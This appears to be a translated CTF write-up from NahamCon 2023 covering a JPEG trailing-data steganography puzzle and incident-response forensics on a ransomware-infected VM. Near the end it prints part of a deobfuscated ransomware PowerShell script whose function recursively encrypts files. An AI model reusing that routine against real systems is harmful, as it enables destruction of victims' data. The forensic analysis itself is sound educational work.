{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-nahamCon-2023-en","result":{"data":{"markdownRemark":{"id":"7bc52c59-8137-5d7b-b62e-88ae81530df2","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-nahamCon-2023\">original page</a>.</p>\n</blockquote>\n<p>I participated in NahamCon CTF 2023 with team 0nePadding and finished 74th out of 2522 teams.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/596145304cb456e1760d24d766be8d23/511f0/88dae4383f32af97250a757e1e8b98aa5a5a5ca32d5d3962a0a52d9bb5a6f87c.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 56.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAACcklEQVQoz31SS08TYRT95tF22plO2+kLaC0llRgCEqNQVFbowqWE2KJtoXWmlEqCKAhqDTFlJ6YLfoCJG6L4IiHduTBBi49EYAG/53i/sawkLk7mzrn3O/fJGGMYGhpCZWYGpmlC1TRw7r+QZZyJx6EoCiLRKMKqipjHc+JnSKfTKFcqmC4VobYdIacLlzwqzhOGjRDShAu6H8OajqggIpZIwAgEEOnoQMjtRtzlgkCJGBMEXB0ZQWHsGirZLIKhkC0YJzTO9ePV9RuodaewFOnCy4tpNHr7cCfV+0/VosMBNwkzjVoMk0i6fwC15WWsrq4in8tRtSU8Xavj2doabmYzGJ+cxGPyVR8+QGNjA6XpaRTyeTtW93qhUIW6roMZhmHPgskSxjMZ3F9cRK5YxPN6HY8owcDgIMxyGS/W17FAPs49qdUwRQmXVlbwenMTASqIawRoBCxIghopd9Ks+hQPwkxAgmakUhs6oYvQIzsQpW9Ckm0uKko2n3R7cOvyFSRUDbxTXhzjqiptSecbczoRpsedDid0SYJKDw36D5BtkFgn2V5RhI/+g2QHiQuScERx29fh9/vBvNQ/H6bIN0SBfEmSQvOgRF6fD1obXgrWCD7O+31w8WsgceaQ7YXwlrkW44aDCJE7T7k5uc130L2dTaXQk0yeGuek7v7ugioTqCpO3p6YwFxlFgvVKu7mCjDzU7hnlVEtlmDRRq3CFKqWCcssYX7WwlzZwvxMBd2xmP2eF8ZOxATCzvsP+L1/iOPDAzS3m9h+t4O93RY+N5v4+OYtPm1tofXtK760dnF89BO/fnzH0f4BxkZHbQ2JRvYHXjZOfKkmRHcAAAAASUVORK5CYII='); background-size: 
cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/596145304cb456e1760d24d766be8d23/8ac56/88dae4383f32af97250a757e1e8b98aa5a5a5ca32d5d3962a0a52d9bb5a6f87c.webp 240w,\n/static/596145304cb456e1760d24d766be8d23/d3be9/88dae4383f32af97250a757e1e8b98aa5a5a5ca32d5d3962a0a52d9bb5a6f87c.webp 480w,\n/static/596145304cb456e1760d24d766be8d23/e46b2/88dae4383f32af97250a757e1e8b98aa5a5a5ca32d5d3962a0a52d9bb5a6f87c.webp 960w,\n/static/596145304cb456e1760d24d766be8d23/40d03/88dae4383f32af97250a757e1e8b98aa5a5a5ca32d5d3962a0a52d9bb5a6f87c.webp 1172w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/596145304cb456e1760d24d766be8d23/8ff5a/88dae4383f32af97250a757e1e8b98aa5a5a5ca32d5d3962a0a52d9bb5a6f87c.png 240w,\n/static/596145304cb456e1760d24d766be8d23/e85cb/88dae4383f32af97250a757e1e8b98aa5a5a5ca32d5d3962a0a52d9bb5a6f87c.png 480w,\n/static/596145304cb456e1760d24d766be8d23/d9199/88dae4383f32af97250a757e1e8b98aa5a5a5ca32d5d3962a0a52d9bb5a6f87c.png 960w,\n/static/596145304cb456e1760d24d766be8d23/511f0/88dae4383f32af97250a757e1e8b98aa5a5a5ca32d5d3962a0a52d9bb5a6f87c.png 1172w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/596145304cb456e1760d24d766be8d23/d9199/88dae4383f32af97250a757e1e8b98aa5a5a5ca32d5d3962a0a52d9bb5a6f87c.png\"\n            alt=\"img\"\n            title=\"img\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Unfortunately the Rev challenges were too difficult for me to solve on my own this time, but I got to tackle some very interesting Forensic incident-response problems.</p>\n<p>There were also some Mobile 
challenges I didn’t have time for — I plan to come back to those later.</p>\n<h2 id=\"tiny-little-fibers-warmup\" style=\"position:relative;\"><a href=\"#tiny-little-fibers-warmup\" aria-label=\"tiny little fibers warmup permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>tiny little fibers (Warmup)</h2>\n<blockquote>\n<p>Oh wow, it’s another of everyone’s favorite. But we like to try and turn the ordinary into <em>extraordinary!</em></p>\n</blockquote>\n<p>The challenge provided the following image as its challenge file.</p>\n<p>Reverse image search showed it to be a publicly available photo, so rather than steganography I suspected some data had been appended directly to the image file, and began investigating.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/6e161606af464bfd50c68ac973049982/c7a90/tiny-little-fibers.jpg\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 66.66666666666666%; position: relative; bottom: 0; left: 0; background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n
srcset=\"/static/6e161606af464bfd50c68ac973049982/8ac56/tiny-little-fibers.webp 240w,\n/static/6e161606af464bfd50c68ac973049982/d3be9/tiny-little-fibers.webp 480w,\n/static/6e161606af464bfd50c68ac973049982/e46b2/tiny-little-fibers.webp 960w,\n/static/6e161606af464bfd50c68ac973049982/f992d/tiny-little-fibers.webp 1440w,\n/static/6e161606af464bfd50c68ac973049982/882b9/tiny-little-fibers.webp 1920w,\n/static/6e161606af464bfd50c68ac973049982/27d84/tiny-little-fibers.webp 2056w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/6e161606af464bfd50c68ac973049982/09b79/tiny-little-fibers.jpg 240w,\n/static/6e161606af464bfd50c68ac973049982/7cc5e/tiny-little-fibers.jpg 480w,\n/static/6e161606af464bfd50c68ac973049982/6a068/tiny-little-fibers.jpg 960w,\n/static/6e161606af464bfd50c68ac973049982/644c5/tiny-little-fibers.jpg 1440w,\n/static/6e161606af464bfd50c68ac973049982/0f98f/tiny-little-fibers.jpg 1920w,\n/static/6e161606af464bfd50c68ac973049982/c7a90/tiny-little-fibers.jpg 2056w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/jpeg\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/6e161606af464bfd50c68ac973049982/6a068/tiny-little-fibers.jpg\"\n            alt=\"tiny-little-fibers\"\n            title=\"tiny-little-fibers\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Uploading the image to <a href=\"https://www.aperisolve.com/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Aperi’Solve</a> returned nothing useful.</p>\n<p>So I tried stegoveritas:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># Install 
stegoveritas</span>\npip3 <span class=\"token function\">install</span> stegoveritas\nstegoveritas_install_deps\n\n<span class=\"token comment\"># Analyze with stegoveritas</span>\nstegoveritas tiny-little-fibers.jpg</code></pre></div>\n<p>Reference: <a href=\"https://github.com/bannsec/stegoVeritas\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">bannsec/stegoVeritas: Yet another Stego Tool</a></p>\n<p>Reading the binary of the file saved as <code class=\"language-text\">trailing_data.bin</code>, I was able to retrieve the Flag string (likely manipulated to make it harder to find with <code class=\"language-text\">strings</code>):</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/7e7124b89d0455e9d05611b50841b76e/1843f/image-20230618120537122.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 18.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA0ElEQVQI12NwM3byNnZz13X30Pd003V31/XwMvBy1nKxkLGwlrU0kzTV5tXW49exEDWwlzZ2lDd3kDW1EtO3Fjcw5FZliDDzSXIOT3QOS3QOjbMPirULSnaNjLT09dKwAyIXBXM9dgVDTmV9DiVddkUddgUgqcehBEQGXCoMwSaeUTYBUTaB0bZBQDLc0g/ICDbxcpAzs5M2thLX1+dUBqoDIW4VoG1AEsoFao6w9ItzDEl0iYhzDAOyY+2DE5zDw8x97KSMXJWs7KVN4EoxEQBKrTDhMo7gNgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/7e7124b89d0455e9d05611b50841b76e/8ac56/image-20230618120537122.webp 240w,\n/static/7e7124b89d0455e9d05611b50841b76e/d3be9/image-20230618120537122.webp 480w,\n/static/7e7124b89d0455e9d05611b50841b76e/e46b2/image-20230618120537122.webp 
960w,\n/static/7e7124b89d0455e9d05611b50841b76e/f52fe/image-20230618120537122.webp 1186w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7e7124b89d0455e9d05611b50841b76e/8ff5a/image-20230618120537122.png 240w,\n/static/7e7124b89d0455e9d05611b50841b76e/e85cb/image-20230618120537122.png 480w,\n/static/7e7124b89d0455e9d05611b50841b76e/d9199/image-20230618120537122.png 960w,\n/static/7e7124b89d0455e9d05611b50841b76e/1843f/image-20230618120537122.png 1186w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7e7124b89d0455e9d05611b50841b76e/d9199/image-20230618120537122.png\"\n            alt=\"image-20230618120537122\"\n            title=\"image-20230618120537122\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>As for how <code class=\"language-text\">trailing_data.bin</code> was extracted — reading the tool’s source code shows it walks through JPEG markers, and once it finds <code class=\"language-text\">\\xff\\xda</code> (Start of Scan), it finds the range from there to <code class=\"language-text\">\\xff\\xd9</code> (end marker) and writes any trailing data after the end marker to a file:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\"># These markers don't have a length attribute</span>\nnonLenMarkers <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span> <span class=\"token string\">b'\\xff\\xd8'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">b'\\xff\\x01'</span><span class=\"token 
punctuation\">,</span> <span class=\"token string\">b'\\xff\\xd0'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">b'\\xff\\xd1'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">b'\\xff\\xd2'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">b'\\xff\\xd3'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">b'\\xff\\xd4'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">b'\\xff\\xd5'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">b'\\xff\\xd6'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">b'\\xff\\xd7'</span> <span class=\"token punctuation\">]</span>\n<span class=\"token comment\"># Note: the quoted source spells the RSTn entries b'\\xffd0' ... b'\\xffd7' (five-byte literals that can never equal a two-byte header); corrected above</span>\n<span class=\"token comment\"># 'image' and 'output_file' are defined by the enclosing stegoVeritas function (this is an excerpt)</span>\n<span class=\"token keyword\">from</span> struct <span class=\"token keyword\">import</span> unpack\n\n<span class=\"token comment\"># Open up the file</span>\n<span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span>image<span class=\"token punctuation\">.</span>veritas<span class=\"token punctuation\">.</span>file_name<span class=\"token punctuation\">,</span><span class=\"token string\">\"rb\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> myFile<span class=\"token punctuation\">:</span>\n    steg <span class=\"token operator\">=</span> myFile<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Byte offset of the marker currently being examined</span>\ni <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n\n<span class=\"token keyword\">while</span> <span class=\"token boolean\">True</span><span class=\"token punctuation\">:</span>\n    <span class=\"token comment\"># Grab the current header</span>\n    hdr <span class=\"token operator\">=</span> steg<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">:</span>i<span class=\"token operator\">+</span><span class=\"token number\">2</span><span class=\"token punctuation\">]</span>\n\n    <span class=\"token comment\"># if Start of Image, Temporary Private, Restart, things that don't have an
associated length field</span>\n    <span class=\"token keyword\">if</span> hdr <span class=\"token keyword\">in</span> nonLenMarkers<span class=\"token punctuation\">:</span>\n            <span class=\"token comment\"># Just move to the next marker</span>\n            i <span class=\"token operator\">=</span> i <span class=\"token operator\">+</span> <span class=\"token number\">2</span>\n            <span class=\"token keyword\">continue</span>\n\n    <span class=\"token comment\"># If we've found our way to the end of the jpeg</span>\n    <span class=\"token keyword\">if</span> hdr <span class=\"token operator\">==</span> <span class=\"token string\">b'\\xff\\xd9'</span><span class=\"token punctuation\">:</span>\n            <span class=\"token comment\">#print(\"Made it to the end!\")</span>\n            <span class=\"token comment\"># Increment 2 so we can check the length</span>\n            i <span class=\"token operator\">+=</span> <span class=\"token number\">2</span>\n            <span class=\"token keyword\">break</span>\n\n    <span class=\"token comment\"># Unpack the length field</span>\n    ln <span class=\"token operator\">=</span> unpack<span class=\"token punctuation\">(</span><span class=\"token string\">\">H\"</span><span class=\"token punctuation\">,</span>steg<span class=\"token punctuation\">[</span>i<span class=\"token operator\">+</span><span class=\"token number\">2</span><span class=\"token punctuation\">:</span>i<span class=\"token operator\">+</span><span class=\"token number\">4</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span>\n\n    <span class=\"token comment\"># print(\"Found Length: {0}\".format(ln))</span>\n\n    <span class=\"token comment\"># Update the index with the known length</span>\n    i <span class=\"token operator\">=</span> i<span class=\"token 
operator\">+</span>ln<span class=\"token operator\">+</span><span class=\"token number\">2</span>\n\n    <span class=\"token comment\"># When we hit scan data, we scan to the end of the format</span>\n    <span class=\"token keyword\">if</span> hdr <span class=\"token operator\">==</span> <span class=\"token string\">b'\\xff\\xda'</span><span class=\"token punctuation\">:</span>\n        <span class=\"token comment\">#print(\"Start of Scan data\")</span>\n        <span class=\"token comment\"># Find the end marker</span>\n        i <span class=\"token operator\">+=</span> steg<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">:</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span>index<span class=\"token punctuation\">(</span><span class=\"token string\">b'\\xff\\xd9'</span><span class=\"token punctuation\">)</span>\n\n    <span class=\"token comment\"># Check for trailers</span>\n    <span class=\"token keyword\">if</span> i <span class=\"token operator\">!=</span> <span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>steg<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Trailing Data Discovered... 
Saving\"</span><span class=\"token punctuation\">)</span>\n        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>steg<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">:</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\n        <span class=\"token comment\"># Save it off for reference</span>\n        <span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span>output_file<span class=\"token punctuation\">,</span> <span class=\"token string\">\"wb\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> outFile<span class=\"token punctuation\">:</span>\n            outFile<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>steg<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">:</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>Reference: <a href=\"https://github.com/bannsec/stegoVeritas/blob/master/stegoveritas/modules/image/analysis/trailing.py\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">stegoVeritas/stegoveritas/modules/image/analysis/trailing.py at master · bannsec/stegoVeritas · GitHub</a></p>\n<p>The <code class=\"language-text\">\\xff\\xda</code> marker is the SOS (Start of Scan) marker, which signals the beginning of Huffman-encoded compressed image data (with <code class=\"language-text\">\\xff\\xd9</code> as the end-of-image marker).</p>\n<p>While a JPEG normally contains a single SOS segment, it is possible to embed multiple SOS segments, and this is apparently used as a steganography technique.</p>\n<p>In this challenge, the Flag was hidden in the trailing data after the SOS segment.</p>\n<h2 id=\"ir-forensic\" style=\"position:relative;\"><a href=\"#ir-forensic\" aria-label=\"ir forensic permalink\" class=\"anchor 
before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>IR (Forensic)</h2>\n<h3 id=\"ir1\" style=\"position:relative;\"><a href=\"#ir1\" aria-label=\"ir1 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>IR1</h3>\n<blockquote>\n<p>Can you find the hidden file on this VM?</p>\n<p>This group of challenges uses the same single file download for each challenge. This is a very large file download (13GB) and will take some time to download.</p>\n</blockquote>\n<p>I started the provided OVA file in VirtualBox, but couldn’t log in because I didn’t know the password. 
(Apparently the password was publicly available on Discord — I wish it had been in the problem description!)</p>\n<p>Instead, I extracted the OVA file (which is actually a tar archive), converted the resulting VMDK file to VHDX with <code class=\"language-text\">qemu-img</code>, and mounted it locally to inspect the files.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># Rename and extract the OVA, then convert to VHDX</span>\n<span class=\"token function\">mv</span> nahamcon.ova nahamcon.tar\n<span class=\"token function\">tar</span> -xvf nahamcon.tar\n<span class=\"token comment\"># The VMDK name contains spaces, so it is quoted (no backslash escaping is needed inside the quotes)</span>\nqemu-img convert -f vmdk -O vhdx <span class=\"token string\">\"Nahamcon Forensics Challenge-disk001.vmdk\"</span> out.vhdx</code></pre></div>\n<p>Mounting <code class=\"language-text\">out.vhdx</code> on a local Windows machine lets you browse the victim machine’s files from the host Explorer.</p>\n<p>Exploring the victim’s folders revealed a hidden folder inside the user profile, which contained a ransom note.
The first Flag was embedded in that ransom note.</p>\n<h3 id=\"ir2\" style=\"position:relative;\"><a href=\"#ir2\" aria-label=\"ir2 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>IR2</h3>\n<blockquote>\n<p>Can you figure out how the malware got onto the system?</p>\n</blockquote>\n<p>This challenge asked us to determine how the malware was delivered.</p>\n<p>I analyzed the mounted virtual hard disk’s event logs with Hayabusa, but could not find any event that clearly pointed to the malware infection vector.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">.<span class=\"token punctuation\">\\</span>hayabusa-2.5.1-win-x64.exe csv-timeline -d <span class=\"token string\">\"E:\\Windows\\System32\\winevt\\Logs\"</span> -o result.csv</code></pre></div>\n<p>After browsing through all the files and installed applications without success, it turned out the answer could be identified from an email visible in the UWP mail client application on the victim machine.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/e5922ce6c45d2d579c6b9f5a28baedcd/7321b/image-20230618173028103.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    
style=\"padding-bottom: 38.33333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABKElEQVQoz4VRXW/DIAzM//9zlaptfViyqVvbQEKBkISQzxv2xhT1YbN0MmB8nI9sWWZQbNuGeZ4xTRPnfVBtGAaEEBjjOHL23vN5AvVmzk9cXNeVG78Jl9gUYIyGNZYfWJblF3Q3rfc1Os9uooLWd36NEIaAqBXFi8Hz4YqqLqHUHc45dF2HpmkY1lr0fY/HyE5PBfLiFefzB+pa4a41dFTWuRGqtrCNRetaHvNREYGm2iM7vksc8ivj+CZwumjkookqt6igjeoNKyMr/goiY4VSW1ykQmUcbDdAtx7Ok+kjE+1VUU4fl0B78i6RZrdPGT2SMNHHJo4XBo81NhNZWZaQUqKqKs5KqWhLzedCCM5US+qZUIofzyIB/Xbyhvb0EeliGum/kb8AsUhsSsSo1+kAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/e5922ce6c45d2d579c6b9f5a28baedcd/8ac56/image-20230618173028103.webp 240w,\n/static/e5922ce6c45d2d579c6b9f5a28baedcd/d3be9/image-20230618173028103.webp 480w,\n/static/e5922ce6c45d2d579c6b9f5a28baedcd/e46b2/image-20230618173028103.webp 960w,\n/static/e5922ce6c45d2d579c6b9f5a28baedcd/2754d/image-20230618173028103.webp 1184w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/e5922ce6c45d2d579c6b9f5a28baedcd/8ff5a/image-20230618173028103.png 240w,\n/static/e5922ce6c45d2d579c6b9f5a28baedcd/e85cb/image-20230618173028103.png 480w,\n/static/e5922ce6c45d2d579c6b9f5a28baedcd/d9199/image-20230618173028103.png 960w,\n/static/e5922ce6c45d2d579c6b9f5a28baedcd/7321b/image-20230618173028103.png 1184w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/e5922ce6c45d2d579c6b9f5a28baedcd/d9199/image-20230618173028103.png\"\n            alt=\"image-20230618173028103\"\n            title=\"image-20230618173028103\"\n            loading=\"lazy\"\n            
style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This was hard to find from just the filesystem, confirming that for this type of challenge you really do need to access the VM directly at some point.</p>\n<h3 id=\"ir3\" style=\"position:relative;\"><a href=\"#ir3\" aria-label=\"ir3 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>IR3</h3>\n<blockquote>\n<p>Can you reverse the malware?</p>\n</blockquote>\n<p>Searching the victim machine’s USERPROFILE directory turned up an obfuscated PowerShell script named <code class=\"language-text\">updates.ps1</code>.</p>\n<p>Manually deobfuscating it yields the following script (excerpt):</p>\n<div class=\"gatsby-highlight\" data-language=\"powershell\"><pre class=\"language-powershell\"><code class=\"language-powershell\"><span class=\"token keyword\">function</span> encryptFiles<span class=\"token punctuation\">{</span>\n<span class=\"token keyword\">Param</span><span class=\"token punctuation\">(</span>\n<span class=\"token namespace\">[Parameter(Mandatory=${true}, position=0)]</span>\n<span class=\"token namespace\">[string]</span> <span class=\"token variable\">$baseDirectory</span>\n<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">foreach</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$File</span> in <span class=\"token punctuation\">(</span><span class=\"token 
function\">Get-ChildItem</span> <span class=\"token variable\">$baseDirectory</span> <span class=\"token operator\">-</span>Recurse <span class=\"token operator\">-</span>File<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">{</span>\n<span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$File</span><span class=\"token punctuation\">.</span>extension <span class=\"token operator\">-ne</span> <span class=\"token string\">\".enc\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">{</span>\n<span class=\"token variable\">$DestinationFile</span> = <span class=\"token variable\">$File</span><span class=\"token punctuation\">.</span>FullName <span class=\"token operator\">+</span> <span class=\"token string\">\".enc\"</span>\n<span class=\"token variable\">$FileStreamReader</span> = <span class=\"token function\">New-Object</span> System<span class=\"token punctuation\">.</span>IO<span class=\"token punctuation\">.</span>FileStream<span class=\"token punctuation\">(</span><span class=\"token variable\">$File</span><span class=\"token punctuation\">.</span>FullName<span class=\"token punctuation\">,</span> <span class=\"token namespace\">[System.IO.FileMode]</span>::Open<span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$FileStreamWriter</span> = <span class=\"token function\">New-Object</span> System<span class=\"token punctuation\">.</span>IO<span class=\"token punctuation\">.</span>FileStream<span class=\"token punctuation\">(</span><span class=\"token variable\">$DestinationFile</span><span class=\"token punctuation\">,</span> <span class=\"token namespace\">[System.IO.FileMode]</span>::Create<span class=\"token 